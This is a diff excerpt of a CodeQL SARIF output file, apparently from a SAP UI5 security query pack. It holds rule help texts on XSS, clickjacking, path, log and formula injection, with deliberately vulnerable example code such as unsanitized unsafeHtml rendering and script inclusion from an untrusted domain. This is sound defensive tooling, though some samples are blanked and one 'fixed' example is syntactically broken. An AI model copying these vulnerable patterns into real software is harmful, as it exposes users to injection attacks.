javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Writing user input directly to a UI5 View allows for\n a cross-site scripting vulnerability.", - "id" : "js/ui5-xss", - "kind" : "path-problem", - "name" : "UI5 Client-side cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/ui5-clickjacking", - "name" : "js/ui5-clickjacking", - "shortDescription" : { - "text" : "UI5 Clickjacking" - }, - "fullDescription" : { - "text" : "The absence of frame options allows for clickjacking." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", - "markdown" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-451" ], - "description" : "The absence of frame options allows for clickjacking.", - "id" : "js/ui5-clickjacking", - "kind" : "problem", - "name" : "UI5 Clickjacking", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/ui5-path-injection", - "name" : "js/ui5-path-injection", - "shortDescription" : { - "text" : "UI5 Path Injection" - }, - "fullDescription" : { - "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", - "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], - "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", - "id" : "js/ui5-path-injection", - "kind" : "path-problem", - "name" : "UI5 Path Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-log-injection", - "name" : "js/ui5-log-injection", - "shortDescription" : { - "text" : "UI5 Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", - "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-117" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/ui5-log-injection", - "kind" : "path-problem", - "name" : "UI5 Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-formula-injection", - "name" : "js/ui5-formula-injection", - "shortDescription" : { - "text" : "UI5 Formula Injection" - }, - "fullDescription" : { - "text" : "Saving data from an uncontrolled remote source using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", - "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1236" ], - "description" : "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", - "id" : "js/ui5-formula-injection", - "kind" : "path-problem", - "name" : "UI5 Formula Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { "name" : "codeql/javascript-queries", - "semanticVersion" : "0.8.1+8e890571ed7b21bc10698c5dbd032b9ed551d8f1", + "semanticVersion" : "0.8.16+b7f0b7afb5f0a65fb53b868ebe77b2e5d1b8d29a", "notifications" : [ { "id" : "js/diagnostics/extraction-errors", "name" : "js/diagnostics/extraction-errors", @@ -300,20 +67,20 @@ "id" : "js/diagnostics/successfully-extracted-files", "name" : "js/diagnostics/successfully-extracted-files", "shortDescription" : { - "text" : "Successfully extracted files" + "text" : "Extracted files" }, "fullDescription" : { - "text" : "Lists all files in the source code directory that were extracted without encountering an error in the file." + "text" : "Lists all files in the source code directory that were extracted." }, "defaultConfiguration" : { "enabled" : true }, "properties" : { "tags" : [ "successfully-extracted-files" ], - "description" : "Lists all files in the source code directory that were extracted without encountering an error in the file.", + "description" : "Lists all files in the source code directory that were extracted.", "id" : "js/diagnostics/successfully-extracted-files", "kind" : "diagnostic", - "name" : "Successfully extracted files" + "name" : "Extracted files" } } ], "rules" : [ { @@ -330,8 +97,8 @@ "level" : "warning" }, "help" : { - "text" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace 